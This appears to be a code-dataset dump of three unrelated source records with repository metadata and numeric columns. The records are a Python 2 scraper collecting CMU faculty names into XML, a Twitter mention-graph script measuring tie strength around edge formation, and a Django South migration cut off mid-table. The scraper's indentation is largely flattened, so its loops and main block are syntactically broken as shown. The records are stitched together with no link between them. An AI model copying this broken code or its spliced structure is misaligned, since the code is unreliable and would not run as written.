doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
xiaoqiqi/CMU/scrap_research.py
|
doge-search/webdoge
|
443e758b5c1f962d5c2fe792cdbed01e1208b1cb
|
[
"Unlicense"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import urllib
import urllib2
import re
import os
import sys
from bs4 import BeautifulSoup
import xml.dom.minidom as minidom
import time
import socket
reload(sys)
sys.setdefaultencoding('utf-8')
fout_xml = open('CMU_research.xml', 'w')
doc = minidom.Document()
institution = doc.createElement("institution")
doc.appendChild(institution)
def after(text):
    # Trim leading and trailing spaces, tabs and newlines; equivalent to the
    # original index loops, but also safe on empty or all-whitespace input.
    return text.strip(' \t\n')
if __name__ == '__main__':
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Computational Biology Department"))
research.appendChild(groupname)
for i in range(0,1):
        url = 'https://www.cs.cmu.edu/directory/cbd?term_node_tid_depth=10571&page='+str(i)
        html = urllib2.urlopen(url).read()
        # The directory pages are UTF-8; decoding as gb2312 with errors ignored is
        # kept from the original, but it may silently drop characters.
        html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Computer Science Department"))
research.appendChild(groupname)
for i in range(0,3):
        url = 'https://www.cs.cmu.edu/directory/csd?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Human-Computer Interaction Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/hcii?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Institute for Software Research"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/isr?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Language Technologies Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/lti?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Machine Learning Department"))
research.appendChild(groupname)
for i in range(0,1):
url = 'https://www.cs.cmu.edu/directory/mld?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
research = doc.createElement("research")
groupname = doc.createElement("groupname")
groupname.appendChild(doc.createTextNode("Robotics Institute"))
research.appendChild(groupname)
for i in range(0,2):
url = 'https://www.cs.cmu.edu/directory/ri?term_node_tid_depth=10571&page='+str(i)
html = urllib2.urlopen(url).read()
html = unicode(html,'gb2312','ignore').encode('utf-8','ignore')
soup = BeautifulSoup(html)
professor_last = soup.findAll('td',{'class':'views-field views-field-field-last-name active'})
professor_first = soup.findAll('td',{'class':'views-field views-field-field-computed-first'})
for i in range(len(professor_last)):
last = professor_last[i]
first = professor_first[i]
professorname = doc.createElement("professorname")
professorname.appendChild(doc.createTextNode(after(first.text)+' '+after(last.text)))
research.appendChild(professorname)
institution.appendChild(research)
doc.writexml(fout_xml, "\t", "\t", "\n")
fout_xml.close()
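# A hedged refactor sketch (assumption: the seven near-identical department blocks
# above could be driven from one table without changing the emitted XML; the lossy
# gb2312 round-trip is dropped here):
# DEPARTMENTS = [
#     ("Computational Biology Department", "cbd", 1),
#     ("Computer Science Department", "csd", 3),
#     ("Human-Computer Interaction Institute", "hcii", 2),
#     ("Institute for Software Research", "isr", 2),
#     ("Language Technologies Institute", "lti", 2),
#     ("Machine Learning Department", "mld", 1),
#     ("Robotics Institute", "ri", 2),
# ]
# for dept_name, slug, pages in DEPARTMENTS:
#     research = doc.createElement("research")
#     groupname = doc.createElement("groupname")
#     groupname.appendChild(doc.createTextNode(dept_name))
#     research.appendChild(groupname)
#     for page in range(pages):
#         url = 'https://www.cs.cmu.edu/directory/%s?term_node_tid_depth=10571&page=%d' % (slug, page)
#         soup = BeautifulSoup(urllib2.urlopen(url).read())
#         lasts = soup.findAll('td', {'class': 'views-field views-field-field-last-name active'})
#         firsts = soup.findAll('td', {'class': 'views-field views-field-field-computed-first'})
#         for first, last in zip(firsts, lasts):
#             professorname = doc.createElement("professorname")
#             professorname.appendChild(doc.createTextNode(after(first.text) + ' ' + after(last.text)))
#             research.appendChild(professorname)
#     institution.appendChild(research)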
| 46.77193
| 103
| 0.671293
| 940
| 7,998
| 5.639362
| 0.120213
| 0.05282
| 0.073948
| 0.029051
| 0.891341
| 0.891341
| 0.891341
| 0.886059
| 0.886059
| 0.876627
| 0
| 0.015897
| 0.182046
| 7,998
| 170
| 104
| 47.047059
| 0.794405
| 0.004751
| 0
| 0.730263
| 0
| 0
| 0.236646
| 0.05303
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.059211
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7184d69414ed7887162b067d591ac2913196fb5f
| 12,452
|
py
|
Python
|
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
src_graph/edge_formation_TOT_ST.py
|
sanja7s/SR_Twitter
|
2eb499c9aa25ba6e9860cd77eac6832890d2c126
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
"""
from the month of edge formation, find the SR before, at the time and after
"""
from collections import defaultdict
import codecs
import os
import json
import numpy as np
from igraph import *
IN_DIR = "../../../DATA/General/"
os.chdir(IN_DIR)
F_IN = "mention/edge_formation_deletion_MOs.dat"
F_OUT = "mention/edge_formation_REL_ST_stats_STRICT.dat"
MONTHS = ["5", "6", "7", "8", "9", "10", "11"]
#########################
# read from a file that is an edge list with weights
#########################
def read_in_MO_graph(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
print G.summary()
return G
def read_in_MO_graph_MUTUAL_UNW(MO):
G = Graph.Read_Ncol('mention/' + MO + '_MENT_weight_dir_self_loops', directed=True, weights=True)
G.to_undirected(mode="mutual", combine_edges='ignore')
print G.summary()
return G
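# NB: mode="mutual" keeps an undirected edge only where both directed mention
# edges exist, so this reader yields a "strong tie" (reciprocated) graph, while
# read_in_MO_graph above keeps every directed mention ("weak ties").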
def extract_edge_formation_REL_ST_with_STDEV_POP():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
            # optionally skip edges that were deleted again during months 6-10
if MO_deletion >= 6 and MO_deletion <= 10:
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=IN, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=IN, weights='weight')
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL POP %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_ACT():
MO_MENT = defaultdict(int)
for MO in MONTHS:
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.strength(nA[0].index, mode=OUT, weights='weight')
except IndexError:
popA = 0
try:
popB = G.strength(nB[0].index, mode=OUT, weights='weight')
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST ACT %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_MUTUAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
#MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
# remove or no
if (MO_deletion <= 11):
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST MUTUAL CONTACTS %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print stdev_bef, stdev_at, stdev_aft
def extract_edge_formation_REL_ST_with_STDEV_TOTAL_UNW():
MO_MENT = defaultdict(int)
for MO in MONTHS:
# strong
#MO_MENT[MO] = read_in_MO_graph_MUTUAL_UNW(MO).copy()
# weak
MO_MENT[MO] = read_in_MO_graph(MO).copy()
output_file = open(F_OUT, 'w')
cnt = 0
TOT_BEFORE = []
TOT_FORMATION = []
TOT_AFTER = []
with codecs.open(F_IN,'r', encoding='utf8') as input_file:
for line in input_file:
(userA, userB, MO_formation, MO_deletion) = line.split()
MO_formation = int(MO_formation)
MO_deletion = int(MO_deletion)
if MO_formation == 4 or MO_formation >= 10:
continue
# remove or no
if (MO_deletion <= 11):
continue
cnt += 1
userA = int(userA)
userB = int(userB)
if userA < userB:
u1 = userA
u2 = userB
else:
u1 = userB
u2 = userA
MO_prior = MONTHS[int(MO_formation)-1-5]
MO_prior = str(MO_prior)
G = MO_MENT[MO_prior]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
prior = abs(popA + popB)
MO_formation = str(MO_formation)
G = MO_MENT[MO_formation]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
print u1, u2, MO_formation
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
print u2, u1, MO_formation
formation = abs(popA + popB)
MO_after = MONTHS[int(MO_formation)+1-5]
MO_after = str(MO_after)
G = MO_MENT[MO_after]
nA = G.vs.select(name = str(u1))
nB = G.vs.select(name = str(u2))
try:
popA = G.degree(nA[0].index)
except IndexError:
popA = 0
try:
popB = G.degree(nB[0].index)
except IndexError:
popB = 0
after = abs(popA + popB)
TOT_AFTER.append(after)
TOT_FORMATION.append(formation)
TOT_BEFORE.append(prior)
output_file.write(str(u1) + '\t' + str(u2) + '\t' + str(MO_formation) + '\t' + \
str(prior)+ '\t' + str(formation)+ '\t' + str(after) + '\n')
print "processed %d edges " % cnt
cnt = float(cnt)
TOT_BEFORE = np.array(TOT_BEFORE)
TOT_FORMATION = np.array(TOT_FORMATION)
TOT_AFTER = np.array(TOT_AFTER)
avg_bef = np.mean(TOT_BEFORE)
stdev_bef = np.std(TOT_BEFORE, dtype=np.float64)
avg_at = np.mean(TOT_FORMATION)
stdev_at = np.std(TOT_FORMATION, dtype=np.float64)
avg_aft = np.mean(TOT_AFTER)
stdev_aft = np.std(TOT_AFTER, dtype=np.float64)
print "Average REL ST MUTUAL CONTACTS %f and stdev %f before, at the time %f, %f and after %f, %f edges formation " % \
(avg_bef, stdev_bef, avg_at, stdev_at, avg_aft, stdev_aft)
print avg_bef, avg_at, avg_aft
print stdev_bef, stdev_at, stdev_aft
print 'Strong contacts sum'
extract_edge_formation_REL_ST_with_STDEV_MUTUAL_UNW()
print 'Total contacts sum, including weak ties'
extract_edge_formation_REL_ST_with_STDEV_TOTAL_UNW()
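# --- Illustrative sketch (editor addition, not part of the original pipeline) ---
# Every variant above repeats one lookup pattern: find an endpoint in a monthly
# mention graph and fall back to 0 when the node is absent that month. A minimal
# helper capturing that pattern, assuming the same igraph objects and 'weight'
# edge attribute used above:
def node_strength_or_zero(G, user, mode=IN):
    try:
        return G.strength(G.vs.select(name=str(user))[0].index, mode=mode, weights='weight')
    except IndexError:
        return 0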
| 26.325581
| 120
| 0.654674
| 2,005
| 12,452
| 3.870324
| 0.07581
| 0.073711
| 0.027835
| 0.040206
| 0.941108
| 0.939046
| 0.933505
| 0.93067
| 0.925129
| 0.912758
| 0
| 0.019485
| 0.204545
| 12,452
| 472
| 121
| 26.381356
| 0.763958
| 0.019997
| 0
| 0.932292
| 0
| 0.010417
| 0.072377
| 0.013363
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015625
| null | null | 0.078125
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
71b3e0bb4cef92389930cf684f37f1c1c5e3e292
| 25,320
|
py
|
Python
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 23
|
2015-01-10T18:17:58.000Z
|
2021-12-21T03:01:38.000Z
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 20
|
2015-01-10T14:05:42.000Z
|
2016-08-09T07:48:50.000Z
|
src/selena/services/migrations/0001_initial.py
|
deejay1/selena
|
16189ee57c8197ab4375727ef8a905d4f4561eb7
|
[
"Apache-2.0"
] | 3
|
2015-01-10T18:27:30.000Z
|
2020-04-07T16:17:43.000Z
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Queue'
db.create_table(u'services_queue', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75, db_index=True)),
))
db.send_create_signal(u'services', ['Queue'])
# Adding model 'Agent'
db.create_table(u'services_agent', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(unique=True, max_length=75, db_index=True)),
('is_main', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('queue', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Queue'], null=True, on_delete=models.PROTECT, blank=True)),
('salt', self.gf('django.db.models.fields.CharField')(max_length=16)),
))
db.send_create_signal(u'services', ['Agent'])
# Adding model 'Service'
db.create_table(u'services_service', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=200, db_index=True)),
('url', self.gf('django.db.models.fields.URLField')(max_length=200)),
('response_code', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=200)),
('performance_issues_time', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=15)),
('connection_timeout', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=30)),
('performance_issues_min_probes_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=8)),
('service_not_working_min_probes_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=8)),
('time_delta', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=10)),
('base_useragent', self.gf('django.db.models.fields.CharField')(default=u'Mozilla/5.0 (X11; U; Linux x86_64; pl-PL; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3', max_length=250)),
('base_referer', self.gf('django.db.models.fields.URLField')(default=u'', max_length=200, null=True, blank=True)),
('auth_user', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('auth_pass', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, auto_now_add=True, blank=True)),
('is_technical_break', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('is_core_service', self.gf('django.db.models.fields.BooleanField')(default=False, db_index=True)),
('hosting', self.gf('django.db.models.fields.BooleanField')(default=False)),
('comments', self.gf('django.db.models.fields.TextField')(null=True, blank=True)),
('order', self.gf('django.db.models.fields.PositiveIntegerField')(default=100)),
('sensitivity', self.gf('django.db.models.fields.DecimalField')(default='0.5', max_digits=3, decimal_places=2)),
('auth_method', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1, db_index=True)),
))
db.send_create_signal(u'services', ['Service'])
# Adding M2M table for field additional_agents on 'Service'
db.create_table(u'services_service_additional_agents', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('service', models.ForeignKey(orm[u'services.service'], null=False)),
('agent', models.ForeignKey(orm[u'services.agent'], null=False))
))
db.create_unique(u'services_service_additional_agents', ['service_id', 'agent_id'])
# Adding model 'MonitoredPhrase'
db.create_table(u'services_monitoredphrase', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('phrase', self.gf('django.db.models.fields.CharField')(max_length=250)),
('shall_not_be', self.gf('django.db.models.fields.BooleanField')(default=False)),
('is_active', self.gf('django.db.models.fields.BooleanField')(default=True, db_index=True)),
('service', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Service'])),
))
db.send_create_signal(u'services', ['MonitoredPhrase'])
# Adding model 'AdditionalRequestParam'
db.create_table(u'services_additionalrequestparam', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=250)),
('useragent', self.gf('django.db.models.fields.CharField')(max_length=250, blank=True)),
('referer', self.gf('django.db.models.fields.URLField')(max_length=200, null=True, blank=True)),
('post', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('get', self.gf('django.db.models.fields.CharField')(max_length=250, null=True, blank=True)),
('service', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['services.Service'])),
))
db.send_create_signal(u'services', ['AdditionalRequestParam'])
# Adding model 'ServiceHistory'
db.create_table(u'services_servicehistory', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('service_id', self.gf('django.db.models.fields.PositiveIntegerField')(db_index=True)),
('response_state', self.gf('django.db.models.fields.PositiveSmallIntegerField')(default=1, db_index=True)),
('request_params_id', self.gf('django.db.models.fields.PositiveIntegerField')(null=True, blank=True)),
('agent_id', self.gf('django.db.models.fields.PositiveIntegerField')()),
('response_code', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('response_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('namelookup_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('connect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('pretransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('starttransfer_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('redirect_time', self.gf('django.db.models.fields.DecimalField')(null=True, max_digits=5, decimal_places=2, blank=True)),
('size_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('speed_download', self.gf('django.db.models.fields.IntegerField')(null=True, blank=True)),
('redirect_count', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('num_connects', self.gf('django.db.models.fields.PositiveSmallIntegerField')(null=True, blank=True)),
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, db_index=True, blank=True)),
('main_probe', self.gf('django.db.models.fields.PositiveIntegerField')(default=0, db_index=True)),
('tick_failed', self.gf('django.db.models.fields.BooleanField')(default=False)),
))
db.send_create_signal(u'services', ['ServiceHistory'])
# Adding model 'ServiceHistoryExtra'
db.create_table(u'services_servicehistoryextra', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
